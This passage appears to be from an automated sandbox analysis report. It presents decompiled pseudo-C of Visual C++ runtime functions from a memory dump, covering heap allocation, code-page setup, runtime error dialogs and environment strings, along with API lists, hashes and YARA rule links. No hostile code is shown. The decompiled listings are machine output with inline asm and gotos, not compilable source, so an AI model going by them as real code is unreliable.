										__eflags =  *0x460a1c;
									} else {
										__eflags = _v22;
										if(_v22 != 0) {
											_t63 =  &_v21;
											while(1) {
												_t69 =  *_t63;
												__eflags = _t69;
												if(_t69 == 0) {
													goto L24;
												}
												_t49 =  *(_t63 - 1) & 0x000000ff;
												_t70 = _t69 & 0x000000ff;
												while(1) {
													__eflags = _t49 - _t70;
													if(_t49 > _t70) {
														break;
													}
													 *(_t49 + 0x460b21) =  *(_t49 + 0x460b21) | 0x00000004;
													_t49 = _t49 + 1;
												}
												_t63 = _t63 + 2;
												__eflags =  *(_t63 - 1);
												if( *(_t63 - 1) != 0) {
													continue;
												}
												goto L24;
											}
										}
										L24:
										_t47 = _t81;
										do {
											 *(_t47 + 0x460b21) =  *(_t47 + 0x460b21) | 0x00000008;
											_t47 = _t47 + 1;
											__eflags = _t47 - 0xff;
										} while (_t47 < 0xff);
										 *0x460c24 = E0045DA9C(_t50);
										 *0x460a1c = _t81;
									}
									_t71 = 0x460a10;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L31:
									E0045DAF8(_t50, _t71); // executed
									goto L1;
								}
							}
							goto L33;
						}
						_v8 = _v8 & 0x00000000;
						_t55 = 0x40;
						memset(0x460b20, 0, _t55 << 2);
						_t79 = _t65 + _t65 * 2 << 4;
						__eflags = _t79;
						asm("stosb");
						_t16 = _t79 + 0x458d90; // 0x458d90
						_t51 = _t16;
						do {
							__eflags =  *_t51;
							_t57 = _t51;
							if( *_t51 != 0) {
								while(1) {
									_t17 =  &(_t57[1]); // 0xdf
									_t66 =  *_t17;
									__eflags = _t66;
									if(_t66 == 0) {
										goto L21;
									}
									_t41 =  *_t57 & 0x000000ff;
									_t74 = _t66 & 0x000000ff;
									__eflags = _t41 - _t74;
									if(_t41 <= _t74) {
										_t19 = _v8 + 0x458d78; // 0x8040201
										_t68 =  *_t19;
										do {
											 *(_t41 + 0x460b21) =  *(_t41 + 0x460b21) | _t68;
											_t41 = _t41 + 1;
											__eflags = _t41 - _t74;
										} while (_t41 <= _t74);
									}
									_t57 =  &(_t57[2]);
									__eflags =  *_t57;
									if( *_t57 != 0) {
										continue;
									}
									goto L21;
								}
							}
							L21:
							_v8 = _v8 + 1;
							_t51 =  &(_t51[8]);
							__eflags = _v8 - 4;
						} while (_v8 < 4);
						 *0x460a1c = 1;
						 *0x460a04 = _a4;
						_t40 = E0045DA9C(_a4);
						_t71 = 0x460a10;
						asm("movsd");
						asm("movsd");
						 *0x460c24 = _t40;
						asm("movsd");
					}
					goto L31;
				} else {
					L1:
					_t77 = 0;
				}
				L33:
				E0045D84E(0x19);
				return _t77;
			}

APIs

Part of subcall function 0045D7ED: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0045E42B,00000009,00000000,00000000,00000001,0045D251,00000001,00000074,?,?,00000000,00000001), ref: 0045D82A
Part of subcall function 0045D7ED: EnterCriticalSection.KERNEL32(?,?,?,0045E42B,00000009,00000000,00000000,00000001,0045D251,00000001,00000074,?,?,00000000,00000001), ref: 0045D845

GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,0045C830), ref: 0045D8F6

Part of subcall function 0045D84E: LeaveCriticalSection.KERNEL32(?,0045DF8B,00000009,0045DF77,00000000,?,00000000,00000000,00000000), ref: 0045D85B

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterInfoInitializeLeave
String ID:
API String ID: 1866836854-0
Opcode ID: eb2656c45f6c3bfa49c9f2d7b47c7306d7e397fb6cc8c4ec2bc330f36a8f71c5
Instruction ID: 9846068ad56f13fed990f12ca494b4931f647655f78b90f14723235582d7d189
Opcode Fuzzy Hash: eb2656c45f6c3bfa49c9f2d7b47c7306d7e397fb6cc8c4ec2bc330f36a8f71c5
Instruction Fuzzy Hash: 044176B1D082905BEB31DBB4D84036B7BE19F4830AF28447BE985D6293D6BD4C4D874E

Uniqueness

Uniqueness Score: -1.00%

Function 0045DEBE, Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E0045DEBE(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x45b8b0);
				_push(E0045D560);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x460c2c; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x45ae94; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E0045D7ED(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = E0045F3D8(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E0045DF84();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x460a00; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x460c28); // executed
					} else {
						E0045D7ED(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = E0045EC2B();
						_v8 = _v8 | 0xffffffff;
						E0045DF25();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0045DFA5

Part of subcall function 0045D7ED: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0045E42B,00000009,00000000,00000000,00000001,0045D251,00000001,00000074,?,?,00000000,00000001), ref: 0045D82A
Part of subcall function 0045D7ED: EnterCriticalSection.KERNEL32(?,?,?,0045E42B,00000009,00000000,00000000,00000001,0045D251,00000001,00000074,?,?,00000000,00000001), ref: 0045D845

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: 382a7b558a3cd30ae59b5704729ab29a43044c9446e47bfeac73aeebc46ffbad
Instruction ID: 14b8c7463d20e42bd23f19e597794005404e6c10196f14037d0aa7d1802273cd
Opcode Fuzzy Hash: 382a7b558a3cd30ae59b5704729ab29a43044c9446e47bfeac73aeebc46ffbad
Instruction Fuzzy Hash: E3218633E00204ABDB20EF65DC42B9EB764EF00765F204527FC16E73C2D778A9498A99

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0045F704, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0045F704(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x460858 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x46085c; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x460860; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x460858(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x460858 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x46085c = GetProcAddress(_t15, "GetActiveWindow");
					 *0x460860 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0045D795,?,Microsoft Visual C++ Runtime Library,00012010,?,0045B808,?,0045B858,?,?,?,Runtime Error!Program: ), ref: 0045F716
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0045F72E
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0045F73F
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0045F74C

Strings

MessageBoxA, xrefs: 0045F728
GetActiveWindow, xrefs: 0045F739
GetLastActivePopup, xrefs: 0045F741
user32.dll, xrefs: 0045F711

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: a713ebb277d1b4442716c436f731940a8e8f6d4a6ffd7f58175943fb614465bc
Instruction ID: 82aae07ad804a559275478a6d9b72a6bb7b276ecf71e3d81b53aa0690f52e056
Opcode Fuzzy Hash: a713ebb277d1b4442716c436f731940a8e8f6d4a6ffd7f58175943fb614465bc
Instruction Fuzzy Hash: 6E011E71610245AF8751EFB59C80A672BE9EB4C792714043BE900D3222E7B8D8499FAA

Uniqueness

Uniqueness Score: -1.00%

Function 0045FADD, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0045FADD(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, char _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x45b940);
				_push(E0045D560);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x460888; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x46087c; // 0x0
								_a20 = _t44;
							}
							_t13 =  &_a28; // 0x4609e4
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~( *_t13) & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E0045E860(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E0045FC50(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x46086c; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x45b920, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x45b91c, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x460888 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

APIs

GetStringTypeW.KERNEL32(00000001,0045B920,00000001,?,751470F0,004609E4,?,?,0045FD02,?,?,?,00000000,00000001), ref: 0045FB1C
GetStringTypeA.KERNEL32(00000000,00000001,0045B91C,00000001,?,?,0045FD02,?,?,?,00000000,00000001), ref: 0045FB36
GetStringTypeA.KERNEL32(?,?,?,?,0045FD02,751470F0,004609E4,?,?,0045FD02,?,?,?,00000000,00000001), ref: 0045FB6A
MultiByteToWideChar.KERNEL32(?,F,?,?,00000000,00000000,751470F0,004609E4,?,?,0045FD02,?,?,?,00000000,00000001), ref: 0045FBA2
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,0045FD02,?), ref: 0045FBF8
GetStringTypeW.KERNEL32(?,?,00000000,0045FD02,?,?,?,?,?,?,0045FD02,?), ref: 0045FC0A

Strings

F, xrefs: 0045FB93, 0045FB9E

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: StringType$ByteCharMultiWide
String ID: F
API String ID: 3852931651-2857159536
Opcode ID: 44a4bf3215ee9ea7eadd92ea669d908f90f1ac6eb51130e829b62e20d80e732b
Instruction ID: 5cda5eef1fe6e138e25ead496d294b320eb4d36e3d35a931db2eac7885421bb2
Opcode Fuzzy Hash: 44a4bf3215ee9ea7eadd92ea669d908f90f1ac6eb51130e829b62e20d80e732b
Instruction Fuzzy Hash: 99419B71900209EFCF219F94DD85EEF7B69FB08751F104436FE01D2262D33899989AAA

Uniqueness

Uniqueness Score: -1.00%

Function 0045D671, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0045D671(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x458c28;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x458cb8) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x458c28; // 0x8000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x460698; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x458b5c == 1) {
						_t16 = _t54 + 0x458c2c; // 0x45b808
						_t56 = _t16;
						_t19 = E0045DFC0( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E0045DD90( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E0045DFC0( &_v424) + 1 > 0x3c) {
								_t49 = E0045DFC0( &_v424) +  &_v424 - 0x3b;
								E0045F790(E0045DFC0( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E0045DD90( &_v164, "Runtime Error!\n\nProgram: ");
							E0045DDA0( &_v164, _t49);
							E0045DDA0( &_v164, "\n\n");
							_t12 = _t54 + 0x458c2c; // 0x45b808
							E0045DDA0( &_v164,  *_t12);
							_t17 = E0045F704( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0045D6DE
GetStdHandle.KERNEL32(000000F4,0045B808,00000000,00000000,00000000,?), ref: 0045D7B4
WriteFile.KERNEL32(00000000), ref: 0045D7BB

Strings

Runtime Error!Program: , xrefs: 0045D744
<program name unknown>, xrefs: 0045D6EE
..., xrefs: 0045D730
Microsoft Visual C++ Runtime Library, xrefs: 0045D78A

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: 3c9ff4b61fe4b50329fef4beac69df0f7b7a50cd78879ecc6a163889dd784fb2
Instruction ID: 669a6ad2395bf69d16c5bf6ec3441bb35e2598d6d7d80c12e2c6851a012a24cd
Opcode Fuzzy Hash: 3c9ff4b61fe4b50329fef4beac69df0f7b7a50cd78879ecc6a163889dd784fb2
Instruction Fuzzy Hash: EB31C472E002186EDB30E760CC45FAE336CEF49306F50046BFD45E6093EA78A98D8A59

Uniqueness

Uniqueness Score: -1.00%

Function 0045CED7, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045CED7() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x4607e4; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E0045DE80(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E0045E040(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E0045DE80(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E0045DC99(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x4607e4 = 2;
					goto L18;
				}
				 *0x4607e4 = 1;
				goto L6;
			}

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0045C826), ref: 0045CEF2
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0045C826), ref: 0045CF06
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0045C826), ref: 0045CF32
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0045C826), ref: 0045CF6A
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0045C826), ref: 0045CF8C
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0045C826), ref: 0045CFA5
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0045C826), ref: 0045CFB8
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0045CFF6

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: 1711d461e2d38e0a3a98c7da594e0fce70e095d75a16f7da1c82ac3953a0853f
Instruction ID: 059c1d434ce4ec00dc91820170b695378bb53829a5c94a23934e48e44329aa02
Opcode Fuzzy Hash: 1711d461e2d38e0a3a98c7da594e0fce70e095d75a16f7da1c82ac3953a0853f
Instruction Fuzzy Hash: E23105739093516FD7307B785CC483BBA9EEA4474A711043BFD42D3282E6299C8982AD

Uniqueness

Uniqueness Score: -1.00%

Function 0045D2C0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0045D2C0(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E0045E860(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E0045D293( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E0045E820("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E0045E7A0( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E0045E6E0(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E0045E4B2(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}

APIs

GetVersionExA.KERNEL32 ref: 0045D2DF
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 0045D314
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0045D374

Strings

__MSVCRT_HEAP_SELECT, xrefs: 0045D30F
__GLOBAL_HEAP_SELECTED, xrefs: 0045D34E

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: b6a4731734317237be46f0b888b782626f6b9bc84657926034d0be77df41e467
Instruction ID: 50081724d3d3ffd217e92d6b4c63f8329e34b3322cdc092f81d912164c93a5c5
Opcode Fuzzy Hash: b6a4731734317237be46f0b888b782626f6b9bc84657926034d0be77df41e467
Instruction Fuzzy Hash: 78312771D01288A9EB359A705C45ADE3768DF06346F1404EBED85D6243E63C9ECECB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0045D009, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0045D009() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E0045DE80(0x480);
				if(_t89 == 0) {
					E0045C898(0x1b);
				}
				 *0x460c40 = _t89;
				 *0x460d40 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x460c40; // 0x5e0630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x460c40; // 0x5e0630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x460d40);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x460d40 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
